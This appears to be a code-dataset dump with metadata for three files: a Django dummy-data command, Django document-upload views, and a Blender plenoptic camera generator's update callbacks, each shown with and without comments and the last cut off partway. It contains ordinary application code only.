rule md2html
command = pandoc --self-contained --toc -c doc/template.css -V documentclass=report --chapters --number-sections -f markdown_github+pandoc_title_block --highlight-style tango $in -o $out
description = PANDOC $out
rule md2pdf
command = pandoc -f markdown_github+pandoc_title_block --highlight-style tango --template=doc/template.tex $in -o $out
description = PANDOC $out
build doc/tutorial.html: md2html doc/tutorial.md
build doc/tutorial.pdf: md2pdf doc/tutorial.md
default {modes_list}
''').format(modes_list = ' '.join(build_modes), **globals()))
| true | true |
f725e0913b22178375a220d288839fa6706545f3 | 520 | py | Python | backend/utils/management/commands/generate_dummy_skills.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | 1 | 2022-01-28T18:20:19.000Z | 2022-01-28T18:20:19.000Z | backend/utils/management/commands/generate_dummy_skills.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | null | null | null | backend/utils/management/commands/generate_dummy_skills.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | null | null | null | from portfolios.factories.skill_factory import create_skills_with_factory
from django.db import transaction
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = "Generates dummy data"
def _generate_dummy_data(self):
# Create dummy data
create_skills_with_factory(
num_of_data=7,
delete_old_data=False
)
@transaction.atomic
def handle(self, *args, **kwargs):
# generate data
self._generate_dummy_data()
| 26 | 73 | 0.698077 | from portfolios.factories.skill_factory import create_skills_with_factory
from django.db import transaction
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = "Generates dummy data"
def _generate_dummy_data(self):
create_skills_with_factory(
num_of_data=7,
delete_old_data=False
)
@transaction.atomic
def handle(self, *args, **kwargs):
self._generate_dummy_data()
| true | true |
f725e110043f228bbfec7d077af9fa005de2f6e4 | 3,844 | py | Python | api/applications/views/documents.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | null | null | null | api/applications/views/documents.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | null | null | null | api/applications/views/documents.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | null | null | null | from django.db import transaction
from django.http import JsonResponse
from rest_framework import status
from rest_framework.views import APIView
from api.applications.libraries.document_helpers import (
upload_application_document,
delete_application_document,
get_application_document,
upload_goods_type_document,
delete_goods_type_document,
get_goods_type_document,
)
from api.applications.libraries.get_applications import get_application
from api.applications.models import ApplicationDocument
from api.applications.serializers.document import ApplicationDocumentSerializer
from api.cases.enums import CaseTypeSubTypeEnum
from api.core.authentication import ExporterAuthentication
from api.core.decorators import (
authorised_to_view_application,
allowed_application_types,
application_in_state,
)
from api.goodstype.helpers import get_goods_type
from api.users.models import ExporterUser
class ApplicationDocumentView(APIView):
    """List the additional documents on an application, or attach a new one."""

    authentication_classes = (ExporterAuthentication,)

    @authorised_to_view_application(ExporterUser)
    def get(self, request, pk):
        """Return every additional document attached to the application."""
        application = get_application(pk)
        queryset = ApplicationDocument.objects.filter(application_id=pk)
        serialized = ApplicationDocumentSerializer(queryset, many=True).data
        return JsonResponse({"documents": serialized, "editable": application.is_major_editable()})

    @transaction.atomic
    @authorised_to_view_application(ExporterUser)
    @application_in_state(is_editable=True)
    def post(self, request, pk):
        """Attach an uploaded document to the application."""
        return upload_application_document(get_application(pk), request.data, request.user)
class ApplicationDocumentDetailView(APIView):
    """Fetch or remove a single additional document on an application."""

    authentication_classes = (ExporterAuthentication,)

    @authorised_to_view_application(ExporterUser)
    def get(self, request, pk, doc_pk):
        """Return the requested document."""
        return get_application_document(doc_pk)

    @transaction.atomic
    @authorised_to_view_application(ExporterUser)
    @application_in_state(is_editable=True)
    def delete(self, request, pk, doc_pk):
        """Remove the document from the application."""
        return delete_application_document(doc_pk, get_application(pk), request.user)
class GoodsTypeDocumentView(APIView):
    """Fetch, upload or remove the document attached to a goods type (HMRC only)."""

    authentication_classes = (ExporterAuthentication,)

    @allowed_application_types([CaseTypeSubTypeEnum.HMRC])
    @authorised_to_view_application(ExporterUser)
    def get(self, request, pk, goods_type_pk):
        """Return the document stored against the goods type."""
        return get_goods_type_document(get_goods_type(goods_type_pk))

    @transaction.atomic
    @allowed_application_types([CaseTypeSubTypeEnum.HMRC])
    @application_in_state(is_major_editable=True)
    @authorised_to_view_application(ExporterUser)
    def post(self, request, pk, goods_type_pk):
        """Store an uploaded document against the goods type."""
        return upload_goods_type_document(get_goods_type(goods_type_pk), request.data)

    @transaction.atomic
    @allowed_application_types([CaseTypeSubTypeEnum.HMRC])
    @authorised_to_view_application(ExporterUser)
    def delete(self, request, pk, goods_type_pk):
        """Remove the goods type's document, rejecting unknown goods types."""
        goods_type = get_goods_type(goods_type_pk)
        if not goods_type:
            return JsonResponse(data={"error": "No such goods type"}, status=status.HTTP_400_BAD_REQUEST)
        return delete_goods_type_document(goods_type)
| 34.630631 | 120 | 0.751821 | from django.db import transaction
from django.http import JsonResponse
from rest_framework import status
from rest_framework.views import APIView
from api.applications.libraries.document_helpers import (
upload_application_document,
delete_application_document,
get_application_document,
upload_goods_type_document,
delete_goods_type_document,
get_goods_type_document,
)
from api.applications.libraries.get_applications import get_application
from api.applications.models import ApplicationDocument
from api.applications.serializers.document import ApplicationDocumentSerializer
from api.cases.enums import CaseTypeSubTypeEnum
from api.core.authentication import ExporterAuthentication
from api.core.decorators import (
authorised_to_view_application,
allowed_application_types,
application_in_state,
)
from api.goodstype.helpers import get_goods_type
from api.users.models import ExporterUser
class ApplicationDocumentView(APIView):
authentication_classes = (ExporterAuthentication,)
@authorised_to_view_application(ExporterUser)
def get(self, request, pk):
application = get_application(pk)
documents = ApplicationDocumentSerializer(ApplicationDocument.objects.filter(application_id=pk), many=True).data
return JsonResponse({"documents": documents, "editable": application.is_major_editable()})
@transaction.atomic
@authorised_to_view_application(ExporterUser)
@application_in_state(is_editable=True)
def post(self, request, pk):
application = get_application(pk)
return upload_application_document(application, request.data, request.user)
class ApplicationDocumentDetailView(APIView):
authentication_classes = (ExporterAuthentication,)
@authorised_to_view_application(ExporterUser)
def get(self, request, pk, doc_pk):
return get_application_document(doc_pk)
@transaction.atomic
@authorised_to_view_application(ExporterUser)
@application_in_state(is_editable=True)
def delete(self, request, pk, doc_pk):
application = get_application(pk)
return delete_application_document(doc_pk, application, request.user)
class GoodsTypeDocumentView(APIView):
authentication_classes = (ExporterAuthentication,)
@allowed_application_types([CaseTypeSubTypeEnum.HMRC])
@authorised_to_view_application(ExporterUser)
def get(self, request, pk, goods_type_pk):
goods_type = get_goods_type(goods_type_pk)
return get_goods_type_document(goods_type)
@transaction.atomic
@allowed_application_types([CaseTypeSubTypeEnum.HMRC])
@application_in_state(is_major_editable=True)
@authorised_to_view_application(ExporterUser)
def post(self, request, pk, goods_type_pk):
goods_type = get_goods_type(goods_type_pk)
return upload_goods_type_document(goods_type, request.data)
@transaction.atomic
@allowed_application_types([CaseTypeSubTypeEnum.HMRC])
@authorised_to_view_application(ExporterUser)
def delete(self, request, pk, goods_type_pk):
goods_type = get_goods_type(goods_type_pk)
if not goods_type:
return JsonResponse(data={"error": "No such goods type"}, status=status.HTTP_400_BAD_REQUEST)
return delete_goods_type_document(goods_type)
| true | true |
f725e3b94ce4f481a86a65896844cc39a93fc830 | 14,044 | py | Python | Blender_CamGen/update.py | Arne-Petersen/Plenoptic-Simulation | 7ca4923eacef16f0282daa511680fb28735eecfa | [
"MIT"
] | 28 | 2018-05-04T13:08:32.000Z | 2022-03-10T10:42:17.000Z | Blender_CamGen/update.py | Arne-Petersen/Plenoptic-Simulation | 7ca4923eacef16f0282daa511680fb28735eecfa | [
"MIT"
] | 14 | 2020-01-14T10:04:38.000Z | 2021-11-10T05:27:29.000Z | Blender_CamGen/update.py | Arne-Petersen/Plenoptic-Simulation | 7ca4923eacef16f0282daa511680fb28735eecfa | [
"MIT"
] | 10 | 2018-09-13T05:50:30.000Z | 2021-05-18T10:19:58.000Z | import bpy
import math
import mathutils
from os import listdir
from os.path import isfile, join
from . raytracer import sensor_position_for_distance
from . import calc
from . import create
from . import data
# ------------------------------------------------------------------------
# Helper functions
# ------------------------------------------------------------------------
# scans the lens folder for csv files containing lens data. The files are then listed in the objective list selector.
def find_items(self, context):
    """Build (and cache) the items for the objective selector EnumProperty.

    Scans the lens directory for lens data CSV files on first use; later
    calls return the cached tuple so UI redraws avoid filesystem access.
    """
    if not data.objective_list_created:
        # all plain files inside the lens directory, sorted for a stable order
        lensfiles = sorted(f for f in listdir(data.lens_directory)
                           if isfile(join(data.lens_directory, f)))
        items = []
        counter = 0
        for lensfile in lensfiles:
            # lens descriptions are CSV files; ignore everything else
            if lensfile.endswith("csv"):
                # "_" separates the lens name from the author/company name
                separator = lensfile.find("_")
                # fall back to the name without the ".csv" suffix when no
                # separator exists (previously the last character was dropped)
                name = lensfile[:separator] if separator != -1 else lensfile[:-4]
                items.append(('OBJECTIVE_' + str(counter), name, lensfile))
                counter = counter + 1
        data.objective_list_created = True
        data.objective_list = tuple(items)
    return data.objective_list
# ------------------------------------------------------------------------
# Update functions
# ------------------------------------------------------------------------
def objective_scale(self, context):
    """Update callback for the objective scale property.

    Intentionally a no-op here; the scale is presumably applied when the
    objective is (re)built elsewhere -- TODO confirm against the operators.
    """
    return
def lens_creation_method(self, context):
    """Mirror the UI's lens creation method selection into the data module."""
    cg = bpy.data.scenes[0].camera_generator
    data.lens_creation_method = cg.prop_lens_creation_method
def sensor(self, context):
    """Resync everything that depends on the sensor dimensions.

    Rescales the diffusor plane, render resolution, orthographic camera and
    the microlens array (object and materials) to the configured sensor
    width/height in millimeters.
    """
    cg = bpy.data.scenes[0].camera_generator
    # rescale diffusor plane (sensor dimensions are in mm, scene units in m)
    if 'Diffusor Plane' in bpy.data.objects:
        bpy.data.objects['Diffusor Plane'].scale[1] = cg.prop_sensor_width / 1000.0
        bpy.data.objects['Diffusor Plane'].scale[2] = cg.prop_sensor_height / 1000.0
    # adjust render resolution assuming square pixels
    bpy.data.scenes[0].render.resolution_x = cg.prop_sensor_width / cg.prop_pixel_size
    bpy.data.scenes[0].render.resolution_y = cg.prop_sensor_height / cg.prop_pixel_size
    # rescale orthographic camera
    if 'Orthographic Camera' in bpy.data.objects:
        bpy.data.cameras['Orthographic Camera'].ortho_scale = max(cg.prop_sensor_width, cg.prop_sensor_height) / 1000.0
    # rescale MLA to sensor size
    if 'Two Plane Model' in bpy.data.objects:
        bpy.data.objects['Two Plane Model'].scale[1] = cg.prop_sensor_width / (1000.0 * bpy.data.objects['Two Plane Model'].dimensions[1])
        bpy.data.objects['Two Plane Model'].scale[2] = cg.prop_sensor_height / (1000.0 * bpy.data.objects['Two Plane Model'].dimensions[2])
        # transform_apply works on the selection, so temporarily select only
        # the MLA object and restore the previous active selection afterwards
        temp_object = bpy.context.active_object
        bpy.context.active_object.select_set(False)
        bpy.data.objects['Two Plane Model'].select_set(True)
        bpy.ops.object.transform_apply(location = False, scale = True, rotation = False)
        bpy.data.objects['Two Plane Model'].select_set(False)
        temp_object.select_set(True)
        # keep the material's notion of the MLA extent in sync as well
        if 'MLA Hex Material' in bpy.data.materials:
            bpy.data.materials['MLA Hex Material'].node_tree.nodes['MLA Width in mm'].outputs['Value'].default_value = cg.prop_sensor_width
            bpy.data.materials['MLA Hex Material'].node_tree.nodes['MLA Height in mm'].outputs['Value'].default_value = cg.prop_sensor_height
        if 'MLA Rect Material' in bpy.data.materials:
            bpy.data.materials['MLA Rect Material'].node_tree.nodes['MLA Width in mm'].outputs['Value'].default_value = cg.prop_sensor_width
            bpy.data.materials['MLA Rect Material'].node_tree.nodes['MLA Height in mm'].outputs['Value'].default_value = cg.prop_sensor_height
def sensor_width(self, context):
    """Update callback for sensor width; delegates to sensor() for all resizing."""
    sensor(self,context)
def sensor_height(self, context):
    """Update callback for sensor height; delegates to sensor() for all resizing."""
    sensor(self,context)
def pixel_size(self, context):
    """Update callback for pixel size; delegates to sensor() (affects resolution)."""
    sensor(self, context)
def sensor_mainlens_distance(self, context):
    """Reposition the sensor (and the MLA in front of it) along the optical axis."""
    cg = bpy.data.scenes[0].camera_generator
    objects = bpy.data.objects
    sensor_x = cg.prop_sensor_mainlens_distance / 1000.0
    if 'Sensor' in objects:
        objects['Sensor'].location[0] = sensor_x
    if 'MLA' in objects:
        # the MLA sits prop_mla_sensor_dist (mm) in front of the sensor
        objects['MLA'].location[0] = sensor_x - cg.prop_mla_sensor_dist / 1000.0
def aperture_blades(self, context):
    """Rebuild the aperture geometry when the blade count changes."""
    if 'Aperture Plane' in bpy.data.objects:
        create.aperture()
def aperture_size(self, context):
    """Rescale the aperture opening and record the semi-aperture in meters."""
    if 'Opening' not in bpy.data.objects:
        return
    size_mm = bpy.data.scenes[0].camera_generator.prop_aperture_size
    opening = bpy.data.objects['Opening']
    opening.scale[1] = size_mm / 1000.0
    opening.scale[2] = size_mm / 1000.0
    # half the diameter, converted from millimeters to meters
    data.semi_aperture = size_mm / 2000.0
def aperture_angle(self, context):
    """Rotate the aperture opening to the configured angle (degrees to radians)."""
    if 'Opening' not in bpy.data.objects:
        return
    angle_deg = bpy.data.scenes[0].camera_generator.prop_aperture_angle
    bpy.data.objects['Opening'].rotation_euler[0] = angle_deg / 180.0 * math.pi
def wavelength(self, context):
    """Recompute every lens element's IOR for the selected wavelength.

    Updates each lens dict's 'ior_wavelength' and 'ior_ratio' entries and
    pushes the resulting ratios into the lens materials' IOR shader nodes.
    """
    if not data.glass_data_known:
        # Not all glass materials are known: force the wavelength back to the
        # 587.6 nm default instead of computing IORs from missing data.
        if abs(bpy.data.scenes[0].camera_generator.prop_wavelength - 587.6) > 0.01:
            bpy.data.scenes[0].camera_generator.prop_wavelength = 587.6
        return
    # nothing to do without a loaded objective
    if not data.objective:
        return
    wavelength_um = bpy.data.scenes[0].camera_generator.prop_wavelength / 1000.0
    # compute the wavelength-dependent IOR for every lens element
    iors = []
    for lens in data.objective:
        if lens['material'] in ('air', 'Air'):
            iors.append(1.0)
        else:
            new_ior = calc.ior(lens['material'], wavelength_um)
            if new_ior is None:
                # unknown material: abort and leave the objective untouched
                iors.clear()
                break
            iors.append(new_ior)
    if iors:
        for counter, lens in enumerate(data.objective):
            lens['ior_wavelength'] = iors[counter]
        # ratio of the IOR in front of each element to the element's own IOR
        for i in range(len(data.objective) - 1, 0, -1):
            data.objective[i]['ior_ratio'] = data.objective[i - 1]['ior_wavelength'] / data.objective[i]['ior_wavelength']
        data.objective[0]['ior_ratio'] = 1.0 / data.objective[0]['ior_wavelength']
        # push the updated ratios into the corresponding lens materials
        for lens in data.objective:
            for obj in bpy.data.objects:
                if obj.name == lens['name']:
                    bpy.data.materials[obj.material_slots[0].name].node_tree.nodes['IOR'].outputs[0].default_value = lens['ior_ratio']
def fresnel_reflection_enabled(self, context):
    """Toggle Fresnel reflections by driving each lens material's reflection color."""
    # Nothing to do without lens data; reflections are also irrelevant while
    # Fresnel transmission is disabled (the output bypasses the mix shader).
    if (len(data.objective) == 0) or (not self.prop_fresnel_transmission_enabled):
        return
    # white enables reflections, black disables them
    intensity = 1 if self.prop_fresnel_reflection_enabled else 0
    for lens in data.objective:
        for obj in bpy.data.objects:
            if obj.name != lens['name']:
                continue
            material = bpy.data.materials[obj.material_slots[0].name]
            color = material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value
            for channel in range(3):
                color[channel] = intensity
def fresnel_transmission_enabled(self, context):
    """Route each lens material's output through the Fresnel mix shader or plain refraction."""
    if len(data.objective) == 0:
        return
    for lens in data.objective:
        for obj in bpy.data.objects:
            if obj.name != lens['name']:
                continue
            tree = bpy.data.materials[obj.material_slots[0].name].node_tree
            # pick the shader feeding the material output: reflection/refraction
            # mix when Fresnel transmission is on, pure refraction otherwise
            if self.prop_fresnel_transmission_enabled:
                source = tree.nodes['Mix Shader'].outputs[0]
            else:
                source = tree.nodes['Refraction BSDF'].outputs[0]
            tree.links.new(source, tree.nodes['Material Output'].inputs[0])
    # the reflection state depends on the transmission setting; refresh it too
    fresnel_reflection_enabled(self, context)
def mla_enabled(self, context):
    """Show or hide the MLA objects and resync sensor-dependent sizes when enabled."""
    enabled = bpy.data.scenes[0].camera_generator.prop_mla_enabled
    for name in ('Two Plane Model', 'MLA'):
        if name in bpy.data.objects:
            mla_object = bpy.data.objects[name]
            mla_object.hide_render = not enabled
            mla_object.hide_viewport = not enabled
    data.use_mla = enabled
    if data.use_mla:
        # MLA dimensions track the sensor; refresh them on enable
        sensor(self, context)
def microlens_diam(self, context):
    """Push the configured microlens diameter into both MLA materials."""
    if 'MLA Hex Material' not in bpy.data.materials:
        return
    diameter = bpy.data.scenes[0].camera_generator.prop_microlens_diam
    for material_name in ('MLA Hex Material', 'MLA Rect Material'):
        node = bpy.data.materials[material_name].node_tree.nodes['Microlens Diameter in um']
        node.outputs['Value'].default_value = diameter
def mla_sensor_dist(self, context):
    """Place the MLA at the configured distance (mm) in front of the sensor."""
    if 'MLA' not in bpy.data.objects:
        return
    offset = bpy.data.scenes[0].camera_generator.prop_mla_sensor_dist / 1000.0
    bpy.data.objects['MLA'].location[0] = bpy.data.objects['Sensor'].location[0] - offset
def ml_type_1_f(self, context):
    """Propagate the type-1 microlens focal length into the active MLA material.

    In single-type mode the type-2/3 focal lengths are forced to follow type 1;
    those property writes re-trigger their own update callbacks.
    """
    if 'MLA Hex Material' in bpy.data.materials:
        cg = bpy.data.scenes[0].camera_generator
        # get currently active MLA type
        is_hex_mla = (cg.prop_mla_type == 'HEX')
        if is_hex_mla:
            bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 1 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
            if not cg.prop_three_ml_types:
                # single-type mode: all three lens types share the same f
                cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
                cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
                bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
                bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
        else:
            # rectangular MLAs have a single microlens focal length
            bpy.data.materials['MLA Rect Material'].node_tree.nodes['Microlens f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
            cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
            cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
def ml_type_2_f(self, context):
    """Propagate the type-2 microlens focal length; in single-type mode it mirrors type 1."""
    if 'MLA Hex Material' in bpy.data.materials:
        # get currently active MLA type
        cg = bpy.data.scenes[0].camera_generator
        is_hex_mla = (cg.prop_mla_type == 'HEX')
        if is_hex_mla:
            if cg.prop_three_ml_types:
                bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_2_f
            else:
                # single-type mode: type 2 follows type 1
                bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
        else:
            # rectangular MLAs only support one type; snap back to type 1's f
            cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
def ml_type_3_f(self, context):
if 'MLA Hex Material' in bpy.data.materials:
# get currently active MLA type
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
if cg.prop_three_ml_types:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_3_f
else:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
def three_ml_types(self, context):
cg = bpy.data.scenes[0].camera_generator
if not cg.prop_three_ml_types:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
else:
if cg.prop_mla_type == 'RECT':
cg.prop_three_ml_types = False
def mla_type(self, context):
cg = bpy.data.scenes[0].camera_generator
# get currently active MLA type
is_hex_mla = (cg.prop_mla_type == 'HEX')
# set materials
if is_hex_mla:
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].data.materials[0] = bpy.data.materials['MLA Hex Material']
else:
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].data.materials[0] = bpy.data.materials['MLA Rect Material']
ml_type_1_f(self,context)
cg.prop_three_ml_types = False
three_ml_types(self,context)
def focus_distance(self, context):
if 'MLA' in bpy.data.objects:
cg = bpy.data.scenes[0].camera_generator
# calculate the new sensor distance
sensor_position = sensor_position_for_distance(cg.prop_focus_distance / 100.0)
if sensor_position != -1.0:
cg.prop_sensor_mainlens_distance = sensor_position * 1000.0
sensor_mainlens_distance(self, context)
# set the calibration pattern to new distance
if 'Calibration Pattern' in bpy.data.objects:
calibration_pattern = bpy.data.objects['Calibration Pattern']
translation = mathutils.Vector((-bpy.data.scenes[0].camera_generator.prop_focus_distance / 100.0, 0.0, 0.0))
translation.rotate(calibration_pattern.rotation_euler)
calibration_pattern.location = translation | 48.09589 | 180 | 0.641698 | import bpy
import math
import mathutils
from os import listdir
from os.path import isfile, join
from . raytracer import sensor_position_for_distance
from . import calc
from . import create
from . import data
def find_items(self, context):
if (not data.objective_list_created):
lensfiles = [f for f in listdir(data.lens_directory) if isfile(join(data.lens_directory, f))]
lensfiles.sort()
result = ()
counter = 0
for lensfile in lensfiles:
file_ending = lensfile[-3:]
if file_ending == "csv":
separator = lensfile.find("_")
result = result + (('OBJECTIVE_'+str(counter),lensfile[:separator],lensfile),)
counter = counter + 1
data.objective_list_created = True
data.objective_list = result
return data.objective_list
def objective_scale(self, context):
return
def lens_creation_method(self,context):
data.lens_creation_method = bpy.data.scenes[0].camera_generator.prop_lens_creation_method
def sensor(self, context):
cg = bpy.data.scenes[0].camera_generator
if 'Diffusor Plane' in bpy.data.objects:
bpy.data.objects['Diffusor Plane'].scale[1] = cg.prop_sensor_width / 1000.0
bpy.data.objects['Diffusor Plane'].scale[2] = cg.prop_sensor_height / 1000.0
bpy.data.scenes[0].render.resolution_x = cg.prop_sensor_width / cg.prop_pixel_size
bpy.data.scenes[0].render.resolution_y = cg.prop_sensor_height / cg.prop_pixel_size
if 'Orthographic Camera' in bpy.data.objects:
bpy.data.cameras['Orthographic Camera'].ortho_scale = max(cg.prop_sensor_width, cg.prop_sensor_height) / 1000.0
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].scale[1] = cg.prop_sensor_width / (1000.0 * bpy.data.objects['Two Plane Model'].dimensions[1])
bpy.data.objects['Two Plane Model'].scale[2] = cg.prop_sensor_height / (1000.0 * bpy.data.objects['Two Plane Model'].dimensions[2])
temp_object = bpy.context.active_object
bpy.context.active_object.select_set(False)
bpy.data.objects['Two Plane Model'].select_set(True)
bpy.ops.object.transform_apply(location = False, scale = True, rotation = False)
bpy.data.objects['Two Plane Model'].select_set(False)
temp_object.select_set(True)
if 'MLA Hex Material' in bpy.data.materials:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['MLA Width in mm'].outputs['Value'].default_value = cg.prop_sensor_width
bpy.data.materials['MLA Hex Material'].node_tree.nodes['MLA Height in mm'].outputs['Value'].default_value = cg.prop_sensor_height
if 'MLA Rect Material' in bpy.data.materials:
bpy.data.materials['MLA Rect Material'].node_tree.nodes['MLA Width in mm'].outputs['Value'].default_value = cg.prop_sensor_width
bpy.data.materials['MLA Rect Material'].node_tree.nodes['MLA Height in mm'].outputs['Value'].default_value = cg.prop_sensor_height
def sensor_width(self, context):
sensor(self,context)
def sensor_height(self, context):
sensor(self,context)
def pixel_size(self, context):
sensor(self, context)
def sensor_mainlens_distance(self, context):
cg = bpy.data.scenes[0].camera_generator
if 'Sensor' in bpy.data.objects:
bpy.data.objects['Sensor'].location[0] = cg.prop_sensor_mainlens_distance / 1000.0
if 'MLA' in bpy.data.objects:
bpy.data.objects['MLA'].location[0] = cg.prop_sensor_mainlens_distance / 1000.0 - cg.prop_mla_sensor_dist / 1000.0
def aperture_blades(self, context):
if 'Aperture Plane' in bpy.data.objects:
create.aperture()
def aperture_size(self, context):
if 'Opening' in bpy.data.objects:
cg = bpy.data.scenes[0].camera_generator
bpy.data.objects['Opening'].scale[1] = cg.prop_aperture_size / 1000.0
bpy.data.objects['Opening'].scale[2] = cg.prop_aperture_size / 1000.0
data.semi_aperture = cg.prop_aperture_size / 2000.0
def aperture_angle(self, context):
if 'Opening' in bpy.data.objects:
bpy.data.objects['Opening'].rotation_euler[0] = bpy.data.scenes[0].camera_generator.prop_aperture_angle/180.0*math.pi
def wavelength(self,context):
if data.glass_data_known == False:
if abs(bpy.data.scenes[0].camera_generator.prop_wavelength - 587.6) > 0.01:
bpy.data.scenes[0].camera_generator.prop_wavelength = 587.6
return
if len(data.objective) == 0:
return
else:
wavelength_um = bpy.data.scenes[0].camera_generator.prop_wavelength/1000.0
iors = []
for lens in data.objective:
if lens['material'] == 'air' or lens['material'] == 'Air':
iors.append(1.0)
else:
new_ior = calc.ior(lens['material'], wavelength_um)
if new_ior == None:
iors.clear()
break
else:
iors.append(new_ior)
if len(iors) > 0:
counter = 0
for lens in data.objective:
lens['ior_wavelength'] = iors[counter]
counter = counter + 1
for i in range(len(data.objective)-1, 0, -1):
data.objective[i]['ior_ratio'] = data.objective[i-1]['ior_wavelength']/data.objective[i]['ior_wavelength']
data.objective[0]['ior_ratio'] = 1.0/data.objective[0]['ior_wavelength']
for lens in data.objective:
for object in bpy.data.objects:
if object.name == lens['name']:
bpy.data.materials[object.material_slots[0].name].node_tree.nodes['IOR'].outputs[0].default_value = lens['ior_ratio']
def fresnel_reflection_enabled(self,context):
if (len(data.objective) == 0) or (not self.prop_fresnel_transmission_enabled):
return
else:
for lens in data.objective:
for object in bpy.data.objects:
if object.name == lens['name']:
material = bpy.data.materials[object.material_slots[0].name]
if self.prop_fresnel_reflection_enabled:
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[0]=1
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[1]=1
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[2]=1
else:
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[0]=0
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[1]=0
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[2]=0
def fresnel_transmission_enabled(self,context):
if len(data.objective) == 0:
return
else:
for lens in data.objective:
for object in bpy.data.objects:
if object.name == lens['name']:
material = bpy.data.materials[object.material_slots[0].name]
if self.prop_fresnel_transmission_enabled:
material.node_tree.links.new(material.node_tree.nodes['Mix Shader'].outputs[0],material.node_tree.nodes['Material Output'].inputs[0])
else:
material.node_tree.links.new(material.node_tree.nodes['Refraction BSDF'].outputs[0],material.node_tree.nodes['Material Output'].inputs[0])
fresnel_reflection_enabled(self,context)
def mla_enabled(self, context):
hide = not bpy.data.scenes[0].camera_generator.prop_mla_enabled
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].hide_render = hide
bpy.data.objects['Two Plane Model'].hide_viewport = hide
if 'MLA' in bpy.data.objects:
bpy.data.objects['MLA'].hide_render = hide
bpy.data.objects['MLA'].hide_viewport = hide
data.use_mla = not hide
if data.use_mla:
sensor(self, context)
def microlens_diam(self, context):
if 'MLA Hex Material' in bpy.data.materials:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Microlens Diameter in um'].outputs['Value'].default_value = bpy.data.scenes[0].camera_generator.prop_microlens_diam
bpy.data.materials['MLA Rect Material'].node_tree.nodes['Microlens Diameter in um'].outputs['Value'].default_value = bpy.data.scenes[0].camera_generator.prop_microlens_diam
def mla_sensor_dist(self, context):
if 'MLA' in bpy.data.objects:
bpy.data.objects['MLA'].location[0] = bpy.data.objects['Sensor'].location[0] - bpy.data.scenes[0].camera_generator.prop_mla_sensor_dist / 1000.0
def ml_type_1_f(self, context):
if 'MLA Hex Material' in bpy.data.materials:
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 1 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
if not cg.prop_three_ml_types:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
bpy.data.materials['MLA Rect Material'].node_tree.nodes['Microlens f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
def ml_type_2_f(self, context):
if 'MLA Hex Material' in bpy.data.materials:
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
if cg.prop_three_ml_types:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_2_f
else:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
def ml_type_3_f(self, context):
